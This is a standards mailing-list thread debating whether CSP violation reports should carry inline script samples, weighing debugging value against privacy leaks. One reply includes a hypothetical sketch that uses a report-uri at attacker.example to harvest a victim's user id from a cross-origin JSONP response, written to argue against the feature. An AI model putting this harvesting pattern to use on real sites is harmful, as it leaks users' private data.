Re: CSP reports: `script-sample`

On Wed, Oct 19, 2016 at 7:14 PM, Brad Hill <hillbrad@gmail.com> wrote:

> Just to add my comment after discussion on today's teleconference:
>
> I'm sympathetic to the argument that "you must trust your reporting
> endpoint" for inline scripts and event handlers.
>
> I'm concerned about it for non-same-origin external scripts.  There are
> lots of "guarded" JSONP-like endpoints that I imagine have PII in the first
> 40 chars, e.g., something like the following where u is a userid:
>
> for(;;);{u:21482823,  ...
>
> Allowing any cross-origin endpoint to request this response and dump it to
> a reporting endpoint of their choice would be very bad.
>

Yes, totally! What we were talking about earlier is reporting script
samples for "inline" script violations such as event handlers and inline
<script> blocks -- this is data which the developer can already access by
inspecting the DOM (though in some cases it can be difficult if the element
has already been removed). The main benefit of having it done by the user
agent is robustness and not requiring the developer to load a "CSP
debugging" library everywhere on their site.

FWIW I'd be strongly opposed to doing this for external scripts because of
the problem you're talking about. Luckily, we generally don't need this for
external scripts because they can already be identified by the blocked-uri,
unlike inline violations.
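
To make that problem concrete: if a UA ever included samples of
cross-origin script bodies, an attacker could combine a policy that
triggers on the script with a report-uri they control and harvest response
prefixes. A rough sketch (attacker.example and victim.example are
hypothetical):

    Content-Security-Policy-Report-Only: script-src 'none';
        report-uri https://attacker.example/collect

    <!-- On the attacker's page; the request carries the victim's cookies.
         If script-sample applied to external scripts, the report would
         include the first N chars of the guarded JSONP response, e.g.
         "for(;;);{u:21482823, ..." -- the victim's user id. -->
    <script src="https://victim.example/user-data.js"></script>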

>
> -Brad
>
> On Wed, Oct 19, 2016 at 8:21 AM Craig Francis <craig.francis@gmail.com>
> wrote:
>
>> On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote:
>>
>> URLs should not contain sensitive data, precisely because they are often
>> relayed to third parties
>>
>>
>>
>> Hi Krzysztof,
>>
>> While I agree, the classic example is a password reset.
>>
>> As in, a link is sent to the user via email, and that link contains a
>> sensitive token that allows someone to change the account password.
>>
>> That said, the token should not live long, to reduce the risk of it being
>> exposed to 3rd parties (e.g. by expiring it after use, or after a certain
>> period of time).
>>
>> Craig
>>
>>
>> On 19 Oct 2016, at 15:34, Krzysztof Kotowicz <kkotowicz@gmail.com> wrote:
>>
>>
>>
>> 2016-10-19 2:16 GMT+02:00 Artur Janc <aaj@google.com>:
>>
>> On Tue, Oct 18, 2016 at 10:05 AM, Mike West <mkwst@google.com> wrote:
>>
>> On Tue, Oct 18, 2016 at 1:03 AM, Artur Janc <aaj@google.com> wrote:
>>
>> On Mon, Oct 17, 2016 at 7:15 PM, Devdatta Akhawe <dev.akhawe@gmail.com>
>> wrote:
>>
>> Hey
>>
>> In the case of a third-party script having an error, what are example
>> leaks you are worried about?
>>
>>
>> The same kinds of issues that lead us to sanitize script errors for
>> things loaded as CORS cross-origin scripts:
>> https://html.spec.whatwg.org/#muted-errors. If the resource hasn't opted-in to being
>> same-origin with you, script errors leak data you wouldn't otherwise have
>> access to.
>>
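
For context, the muted-errors behavior in a nutshell: for a script loaded
cross-origin without a CORS opt-in, window.onerror only sees a sanitized
signal. A rough sketch, with a hypothetical third-party URL:

    <script>
      window.onerror = function (msg, src, line, col, err) {
        // Without crossorigin= on the tag plus CORS headers on lib.js,
        // the UA mutes the details: msg is just "Script error." and
        // src/line/col are stripped, so error messages can't leak
        // cross-origin response data.
      };
    </script>
    <script src="https://third-party.example/lib.js"></script>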
>>
>> Thanks for the summary, Mike! It's a good overview of the issue, but I'd
>> like to expand on the reasoning for why including the prefix of an inline
>> script doesn't sound particularly scary to me.
>>
>>
>> Thanks for fleshing out the counterpoints, Artur!
>>
>>
>> Basically, in order for this to be a concern, all of the following
>> conditions need to be met:
>>
>> 1. The application has to use untrusted report collection infrastructure.
>> If that is the case, the application is already leaking sensitive data from
>> page/referrer URLs to its collector.
>>
>>
>> "trusted" to receive URLs doesn't seem to directly equate to "trusted" to
>> store sensitive data. If you're sure that you don't have sensitive data on
>> your pages, great. But you were also presumably "sure" that you didn't have
>> inline script on your pages, right? :)
>>
>>
>> Keep in mind that URLs are sensitive data for most applications and they
>> are currently being sent in violation reports.
>>
>>
>> URLs should not contain sensitive data, precisely because they are often
>> relayed to third parties in e.g. referrer. If they do, that's usually
>> considered a vulnerability by e.g. OWASP, especially if the URL is
>> capability-bearing (IDOR
>> <https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References>
>> is even in OWASP Top 10). I agree that some applications disclose sensitive
>> information in URLs, but that should not be the majority of them. I think
>> that for a lot of applications URLs reported through e.g. CSP violation
>> reports are still subject to regular access control, whereas we just don't
>> know yet if sensitive tokens are not included in script samples. It's
>> likely that some IDs are present in inline scripts, e.g. <a href=#
>> onclick=a.select(123)>.
>>
The password reset example Craig is talking about is a fairly ubiquitous
feature which generally needs to pass sensitive data in the URL for
compatibility with email clients. Also, capability URLs are a thing in a
lot of apps (e.g. Google Docs), and so are various features which reveal
the identity of the current user (/profile/koto).

But even without direct leaks of PII and SPII, URLs contain a lot of data
about the current user, the data they have in the given application, and
their interactions with the app. For example, a search engine is likely to
disclose your queries, a social network will leak the IDs of your friends
and groups you belong to, a mapping site will have your location, and even
a news site will disclose the articles you read, which are sensitive in
certain contexts.

This is difficult to prove definitively, but I'd say that an application
which doesn't have any interesting/sensitive data in its URLs would be an
exception rather than the norm. But I'm not sure how to convince you
other than letting you pick some interesting apps and trying to find
interesting stuff in their URLs ;-)

Cheers,
-A


>
>>
>> I'm having a difficult time imagining a case where an application is okay
>> with disclosing their URLs to a third-party for the purpose of debugging
>> violation reports, and is not okay with disclosing script prefixes for the
>> same purpose, given that:
>> 1) Almost all applications have sensitive data in URLs, compared to a
>> certainly real, but less specific risk of having inline scripts with
>> sensitive data in their prefixes, assuming the sample is limited to a
>> reasonable length.
>>
>>
>> Citation needed (for the "almost all" claim). I agree the risk of leaking
>> sensitive data might be mitigated by adding a reasonable length limit.
>>
>> 2) URLs are disclosed much more frequently than script samples would be,
>> because they are sent with every report (not just "inline" script-src
>> violations). In the `referrer` field, the UA is also sending a URL of
>> another, unrelated page, increasing the likelihood that sensitive data will
>> appear in the report.
>>
>>
>> Which is why it's a best practice not to have sensitive data in URLs, but
>> to instead use e.g. cookies or POST parameters to transfer them.
>>
>>
>> 3) There is no sanitization of URL parameters in violation reports,
>> compared to the prefixing logic we're considering for script samples.
>>
>>
>> In fact, I'd be much more worried about URLs than script prefixes,
>> because URLs leak on *any* violation (not just for script-src) and URLs
>> frequently contain PII or authorization/capability-bearing tokens, e.g.
>> for password reset functionality.
>>
>>
>> We've talked a bit about URL leakage in
>> https://github.com/w3c/webappsec-csp/issues/111. I recall that Emily was
>> reluctant to apply referrer policy to the page's URL vis-à-vis the
>> reporting endpoint, but I
>> still think it might make sense.
>>
>>
>> 2. The application needs to have a script which includes sensitive user
>> data somewhere in the first N characters. FWIW in our small-scale analysis
>> of a few hundred thousand reports we saw ~300 inline script samples sent
>> by Firefox (with N=40) and found no sensitive tokens in any of the
>> snippets.
>>
>>
>> Yup. I'm reluctant to draw too many conclusions from that data, given the
>> pretty homogeneous character of the sites we're currently applying CSP to
>> at Google, but I agree with your characterization of the data.
>>
>> Scott might have more data from a wider sampling of sites, written by a
>> wider variety of engineering teams (though it's not clear that the terms of
>> that site would allow any analysis of the data).
>>
>>
>> I completely agree, this data is just what we had readily available -- we
>> can certainly do a much larger analysis of script prefixes based on the
>> search index. That said, if we're worried about the script-sample approach,
>> perhaps not seeing any sensitive data in the first dataset we looked at
>> could be a signal that it's worth pursuing further.
>>
>> 3. The offending script needs to cause a CSP violation, i.e. not have a
>> valid nonce, meaning that the application is likely broken if the policy is
>> in enforcing mode.
>>
>>
>> 1. Report mode exists.
>>
>> 2. Embedded enforcement might make it more likely that XSS on a site
>> could cause policy to be inadvertently applied to itself or its
>> dependencies. We talked about this briefly last week, and I filed
>> https://github.com/w3c/webappsec-csp/issues/126 to ponder it. :)
>>
>>
>> Since CSPs applied by embedded enforcement serve a very different purpose
>> than current policies (they don't try to mitigate script injection), it
>> would very likely be okay to just not include script-sample data for such
>> policies. Also, embedded enforcement is still pretty far off, and the
>> reporting problem is an issue for pretty much every site currently
>> gathering violation reports; we should probably weigh the value of fixing
>> CSP reporting accordingly.
>>
>>
>> As a security engineer, I would consider #1 to be the real security
>> boundary -- a developer should use a CSP collector she trusts because
>> otherwise, even without script-sample, reports contain data that can
>> compromise the application.
>>
>>
>> That sounds like an argument for reducing the amount of data in reports,
>> not for increasing it. I think it's somewhat rational to believe that
>> reporting endpoints are going to have longer retention times and laxer
>> retention policies than application databases. Data leaking from the latter
>> into the former seems like a real risk. I agree that the URL itself already
>> presents risks, but I don't understand how that's a justification for
>> accepting more risk.
>>
>>
>> It is an argument for using trusted infrastructure when building your
>> application ;-) Developers are already accustomed to deciding whether to
>> place trust in various components of their apps, whether it's the hosting
>> platform and OS, server-side modules and libraries, or JS widgets and other
>> embedded resources. A CSP violation endpoint is currently a
>> security-critical part of an application because it receives URLs; people
>> who don't trust their collection infrastructure already have insecure
>> applications and adding script-sample to reports does little to change
>> this. (Note that this wouldn't hold for applications which have nothing
>> sensitive in URLs and embed sensitive data at the beginning of inline
>> scripts, but this doesn't seem like a common pattern.)
>>
>> Basically, the reluctance to include relevant debugging information in
>> the violation report seems to be somewhat of a misplaced concern to me,
>> because it ignores the trust relationship the application owner must
>> already have with their report collection endpoint.
>>
>> Perhaps it's pertinent to take a step back and think about the reason to
>> have reporting functionality in CSP in the first place -- after all, the
>> mechanism could certainly work only via throwing SecurityPolicyViolation
>> events and requiring developers to write their own logging code. The fact
>> that this capability exists in UAs, and is not restricted to sending
>> reports to the same origin or same "base domain" (contrary to the original
>> proposals, e.g. in http://research.sidstamm.com/papers/csp-www2010.pdf)
>> indicates that CSP wants to be flexible and give developers ultimate
>> control over the reporting functionality. Given this design choice, it
>> seems okay to trust the developer to pick the right report URI for their
>> application and include useful debugging data if the developer wants it; in
>> a way, the status quo is the worst of both worlds, because it already
>> requires the developer to fully trust the collector, but doesn't give her
>> enough useful data to track down causes of violations.
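
As a reference point, the hand-rolled version is already expressible today;
a minimal sketch using the SecurityPolicyViolationEvent interface from the
CSP3 draft, reporting to one's own origin:

    document.addEventListener('securitypolicyviolation', function (e) {
      // Ship only the fields we care about to our own collector; the
      // 'sample' attribute is the draft's counterpart of script-sample.
      navigator.sendBeacon('/csp-report', JSON.stringify({
        blockedURI: e.blockedURI,
        violatedDirective: e.violatedDirective,
        sample: e.sample
      }));
    });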
>>
>> In case it helps: Lukas ran a quick analysis of the report-uri values
>> we've seen in the wild, and e.g. for the domains with CSP in the Alexa
>> top 100,000 we see the following:
>> - 49% don't set a report-uri
>> - 29% have a report-uri pointing to a relative path (/foo)
>> - 10% have a report-uri pointing to the same origin, with another 1%
>> using a sibling subdomain (foo.example.org reporting to csp.example.org)
>>
>> Out of the remaining ~10% which send violations to external URLs, about
>> half point to report-uri.io and a couple of other logging services, and
>> the rest seem to use another domain owned by the same person/organization,
>> e.g. vine.co sends reports to twitter.com. The data for all domains in
>> our set isn't substantially different (66% without report-uri; 24%
>> reporting to own domain; 10% externally). This data doesn't include all the
>> Google ccTLDs and a couple of other big providers, and I'm sure it's
>> missing some other domains, e.g. ones with CSP in parts of the site
>> requiring authentication, but AFAIK it shouldn't have a systematic bias
>> otherwise.
>>
>> I can easily imagine scripts that meet conditions #2 and #3, but at
>> the same time we have not seen many examples of such scripts so far, nor
>> have people complained about the script-sample data already being included
>> by Firefox (AFAIK).
>>
>>
>> People are generally unlikely to complain about getting more data,
>> especially when the data's helpful and valuable. That can justify pretty
>> much anything, though: lots of people think CORS is pretty restrictive, for
>> instance, and probably wouldn't be sad if we relaxed it in various ways.
>>
>>
>> Overall, I don't see the gathering of script samples as qualitatively
>> different to the collection of URLs. However, if we are indeed particularly
>> worried about script snippets, we could make this opt-in and enable the
>> functionality only in the presence of a new keyword (report-uri /foo
>> 'report-script-samples') and add warnings in the spec to explain the
>> pitfalls. This way even if I'm wrong about all of the above we would not
>> expose any data from existing applications.
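
For illustration, such a policy might read as follows; the keyword is
hypothetical and not part of the current spec:

    Content-Security-Policy: script-src 'nonce-r4nd0m';
        report-uri /csp-collector 'report-script-samples'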
>>
>>
>> I suspect that such an option would simply be copy-pasted into new
>> policies, but yes, it seems like a reasonable approach.
>>
>>
>> For some background about why we're even talking about this: currently
>> violation reports are all but useless for both debugging and detection of
>> the exploitation of XSS due to the noise generated by browser extensions.
>>
>>
>> I agree that this is a problem that we should solve. One way of solving
>> it is to add data to the reports. Another is to invest more in cleaning up
>> the reports that you get so that there's less noise. I wish browser vendors
>> (including Chrome) spent more time on the latter, as we're actively harming
>> users by not doing so.
>>
>>
>> Yes, fixing the blocking and reporting of extension-injected scripts
>> would certainly help (although note that "less noise" likely isn't
>> sufficient; it really has to be zero noise), but IIRC prior discussions
>> we've had about the topic indicated that this is an almost intractable
>> problem, so it would be great to find alternative solutions.
>>
>> The script-sample approach also has several important advantages: even
>> without extension-related false positives, developers would have very
>> little information about the actual cause of inline script violations
>> (which are the majority of possible CSP problems in nonce-based policies).
>> Sending some of the script text not only makes it possible to discard all
>> spurious reports, but also gives the developer the crucial bit of data to
>> find and fix actual site errors; it seems like a workable solution to the
>> current reporting problems faced by many sites.
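
A sketch of how a collector could use the sample to separate site bugs from
noise; loadInlineScriptPrefixes() is an assumed helper returning the first
40 characters of each legitimate first-party inline script, e.g. extracted
at build time:

    const knownPrefixes = loadInlineScriptPrefixes();
    function triage(report) {
      const sample = report['csp-report']['script-sample'] || '';
      if (!sample) return 'other';
      // A sample matching our own code means a nonce/hash was missed --
      // a real site bug. Everything else (extension-injected or attacker
      // script) can be bucketed separately instead of drowning the signal.
      return knownPrefixes.some(p => p.startsWith(sample)) ? 'site-bug' : 'other';
    }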
>>
>> Cheers,
>> -Artur
>>
>>
>>
>>
>> --
>> Best regards,
>> Krzysztof Kotowicz
>>
>>
>>

Received on Wednesday, 19 October 2016 19:47:10 UTC